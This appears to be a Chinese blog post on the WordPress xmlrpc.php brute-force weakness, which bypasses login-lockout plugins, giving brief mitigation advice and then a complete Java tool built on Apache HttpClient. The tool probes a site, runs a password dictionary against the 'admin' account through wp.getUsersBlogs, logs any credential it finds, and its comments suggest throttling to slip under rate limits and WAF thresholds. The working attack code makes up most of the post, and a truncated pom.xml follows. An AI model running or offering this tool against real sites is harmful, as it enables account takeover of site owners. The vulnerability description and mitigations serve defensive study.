Wordpress xmlrpc.php暴力破解漏洞

Wordpress xmlrpc.php暴力破解漏洞

WordPress 是很流行的開源博客系統,它提供遠程發佈文章的接口,即站點根路徑下的 xmlrpc.php 文件。最近曝出的 xmlrpc 問題是:經由 xmlrpc 接口進行認證時,即便認證失敗,也不會被多數只監控 wp-login.php 的登入防護插件記錄,因此不會觸發「密碼輸錯 N 次即鎖定」的機制,於是帳號可能被暴力破解;若密碼又是弱口令,就相當危險了。最簡單的緩解辦法是移除或在 Web 伺服器層封鎖 xmlrpc.php;但要注意這會讓 Jetpack、手機 App 等依賴 XML-RPC 的功能失效,且 WordPress 升級時可能重新生成該文件,因此更穩妥的做法是透過 WordPress 的 `xmlrpc_enabled` 過濾器停用它、對該接口做速率限制,並同時使用強密碼。閒來無事,用 Java 寫了一個暴力破解的腳本,其實就是拿着各種用戶名、密碼不斷調用 xmlrpc.php 文件,檢測認證結果,很簡單。只爲研究與娛樂:暴力破解只可針對你已獲明確授權測試的站點,請大家慎重。

Xmlrpc.java 源碼以下:

    package com.yeetrack.security.wordpress;

    import java.io.*;
    import java.nio.charset.StandardCharsets;
    import java.nio.file.Files;
    import java.nio.file.Paths;

    import org.apache.http.HttpEntity;
    import org.apache.http.client.ClientProtocolException;
    import org.apache.http.client.config.RequestConfig;
    import org.apache.http.client.methods.CloseableHttpResponse;
    import org.apache.http.client.methods.HttpGet;
    import org.apache.http.client.methods.HttpPost;
    import org.apache.http.entity.ContentType;
    import org.apache.http.entity.StringEntity;
    import org.apache.http.impl.client.CloseableHttpClient;
    import org.apache.http.impl.client.HttpClients;
    import org.apache.http.util.EntityUtils;
    import org.slf4j.Logger;
    import org.slf4j.LoggerFactory;
    import org.testng.annotations.Test;

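    /**
     * Created by victor wang on 2014/8/2.
     *
     * Dictionary attack against a WordPress site's {@code xmlrpc.php}: each candidate
     * password is submitted through the {@code wp.getUsersBlogs} XML-RPC method, whose
     * failed authentications are not counted by login-protection plugins that only
     * watch wp-login.php (see the article text).
     *
     * Only run this against hosts you are explicitly authorised to test.
     */
    public class Xmlrpc
    {
        private static final Logger logger = LoggerFactory.getLogger(Xmlrpc.class);

        /** Browser-like User-Agent; installed as the client default so every request carries it. */
        private static final String USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0";

        /** Connect / socket / pool timeouts in milliseconds: a dictionary loop must not hang on a dead host. */
        private static final int TIMEOUT_MS = 4000;

        /** Account to attack and the dictionary file (one candidate password per line, UTF-8). */
        private static final String TARGET_USERNAME = "admin";
        private static final String DICTIONARY_PATH = "src/main/resources/1pass00.txt";

        /** Body text WordPress returns for a plain GET of xmlrpc.php. */
        private static final String XMLRPC_GET_MARKER = "XML-RPC server accepts POST requests only.";

        /** Shared client; closed at the end of {@link #test()}. */
        private final CloseableHttpClient httpClient = HttpClients.custom()
                .setUserAgent(USER_AGENT)
                .setDefaultRequestConfig(RequestConfig.custom()
                        .setConnectionRequestTimeout(TIMEOUT_MS)
                        .setConnectTimeout(TIMEOUT_MS)
                        .setSocketTimeout(TIMEOUT_MS)
                        .build())
                .build();

        /**
         * Probes {@code <scheme>://<host>/xmlrpc.php} with a GET and reports whether the
         * body carries the marker WordPress emits for that endpoint.
         *
         * @param domain host or URL of the site (scheme and path are normalised away)
         * @return true only if the endpoint answered with the WordPress marker text;
         *         false for an empty target, a network error, or any other body
         */
        private boolean checkXmlRpcFile(String domain)
        {
            String endpoint = xmlRpcEndpoint(domain);
            if (endpoint == null)
                return false;
            HttpGet get = new HttpGet(endpoint);
            // try-with-resources: the original never closed the response, leaking the
            // connection on every probe, and dereferenced a null body after an IOException.
            try (CloseableHttpResponse response = httpClient.execute(get)) {
                HttpEntity entity = response.getEntity();
                if (entity == null)
                    return false;
                String body = EntityUtils.toString(entity, StandardCharsets.UTF_8);
                return body != null && body.contains(XMLRPC_GET_MARKER);
            } catch (IOException e) {
                logger.warn("{}: probe failed: {}", endpoint, e.toString());
                return false;
            }
        }

        /**
         * Submits one username/password pair through {@code wp.getUsersBlogs}.
         *
         * Both values are XML-escaped before being embedded in the request body: a
         * dictionary entry containing {@code <}, {@code &} or a quote would otherwise
         * yield a malformed request that WordPress rejects, so that candidate would be
         * silently skipped instead of tested. The request is sent as UTF-8 so non-ASCII
         * candidates reach the server exactly as read from the dictionary.
         *
         * @param username account name to try
         * @param password candidate password
         * @param url      site host or URL (normalised like in checkXmlRpcFile)
         * @return true if the response contains {@code isAdmin} (a field of the blog
         *         struct returned on success); false on a failed login, an empty
         *         target, an empty response, or an I/O error
         */
        private boolean forceLogin(String username, String password, String url)
        {
            String endpoint = xmlRpcEndpoint(url);
            if (endpoint == null)
                return false;
            String xmlString = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><methodCall>"
                    + "<methodName>wp.getUsersBlogs</methodName><params>"
                    + "<param><value>" + escapeXml(username) + "</value></param>"
                    + "<param><value>" + escapeXml(password) + "</value></param>"
                    + "</params></methodCall>";
            HttpPost post = new HttpPost(endpoint);
            post.setEntity(new StringEntity(xmlString, ContentType.create("text/xml", StandardCharsets.UTF_8)));
            try (CloseableHttpResponse response = httpClient.execute(post)) {
                HttpEntity entity = response.getEntity();
                if (entity == null)
                    return false;
                String loginResult = EntityUtils.toString(entity, StandardCharsets.UTF_8);
                if (loginResult == null || loginResult.isEmpty())
                    return false;
                if (loginResult.contains("isAdmin")) {
                    // NOTE: this writes a valid credential into the log; protect or purge the log file.
                    logger.info("{}登陸成功,userename--->{}  password--->{}", url, username, password);
                    return true;
                }
                return false;
            } catch (IOException e) {
                logger.warn("{}: login attempt failed to complete: {}", endpoint, e.toString());
                return false;
            }
        }

        /**
         * Escapes the five XML special characters so a credential cannot break out of
         * its {@code <value>} element (or inject further XML-RPC elements).
         *
         * @param s raw text, never null
         * @return the escaped text
         */
        static String escapeXml(String s)
        {
            StringBuilder out = new StringBuilder(s.length());
            for (int i = 0; i < s.length(); i++) {
                char c = s.charAt(i);
                switch (c) {
                    case '&':  out.append("&amp;");  break;
                    case '<':  out.append("&lt;");   break;
                    case '>':  out.append("&gt;");   break;
                    case '"':  out.append("&quot;"); break;
                    case '\'': out.append("&apos;"); break;
                    default:   out.append(c);
                }
            }
            return out.toString();
        }

        /**
         * Normalises a target to its bare host: strips a leading {@code http://} or
         * {@code https://} and everything from the first {@code /} onwards.
         *
         * @param url host or URL, may be null or empty
         * @return the host part, or null for a null/empty input
         */
        private String wrapperUrl(String url)
        {
            if (url == null || url.isEmpty())
                return null;
            if (url.startsWith("http://"))
                url = url.substring("http://".length());
            else if (url.startsWith("https://"))
                url = url.substring("https://".length());
            int slash = url.indexOf('/');
            return slash >= 0 ? url.substring(0, slash) : url;
        }

        /**
         * Builds the xmlrpc.php URL for a target, keeping https when the target was
         * given with that scheme. The original always downgraded to plain http, which
         * sends every candidate credential in clear text and fails on https-only hosts.
         *
         * @return {@code scheme://host/xmlrpc.php}, or null if no host can be derived
         */
        private String xmlRpcEndpoint(String url)
        {
            String host = wrapperUrl(url);
            if (host == null || host.isEmpty())
                return null;
            String scheme = url.startsWith("https://") ? "https" : "http";
            return scheme + "://" + host + "/xmlrpc.php";
        }

        /**
         * Entry point (executed as a TestNG test): probes the target, then tries every
         * non-empty line of the dictionary as the password of {@code TARGET_USERNAME}
         * until one succeeds.
         *
         * The dictionary is read as UTF-8 inside try-with-resources and the HTTP client
         * is closed on exit; the original used the platform charset and never closed
         * the reader or the client.
         */
        @Test
        public void test()
        {
            String url = "http://somewordpress.com/xmlrpc.php";
            try {
                if (!checkXmlRpcFile(url)) {
                    logger.info("{}--->不存在xmlrpc漏洞", url);
                    return;
                }
                try (BufferedReader reader = Files.newBufferedReader(Paths.get(DICTIONARY_PATH), StandardCharsets.UTF_8)) {
                    String line;
                    int count = 1;
                    while ((line = reader.readLine()) != null) {
                        if (line.isEmpty())
                            continue;
                        System.out.println(count + "  " + line);
                        if (forceLogin(TARGET_USERNAME, line, url))
                            break;
                        count++;
                        // Optional throttle, e.g. Thread.sleep(500), to stay under rate limits / WAF thresholds.
                    }
                } catch (IOException e) {
                    logger.error("could not read dictionary {}", DICTIONARY_PATH, e);
                }
            } finally {
                try {
                    httpClient.close();
                } catch (IOException e) {
                    logger.warn("failed to close HTTP client: {}", e.toString());
                }
            }
        }
    }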

項目使用 Maven 管理,依賴 Apache 的 httpclient、slf4j 日誌門面(本文以 log4j 作爲後端)以及 testng(用於以 @Test 方式執行)。pom.xml 代碼如下(此處僅保留了文件頭,dependencies 部分未完整列出):

    <?xml version="1.0" encoding="UTF-8"?>
    <project xmlns="http://maven.apache.org/POM/4.0.0"
             xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
             xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
        <modelVersion>4.0.0</modelVersion>

        <groupId>com.yeetrack.security</groupId>
        <artifactId>wordpress-xmlrpc</artifactId>
        <version>1.0-SNAPSHOT</version>

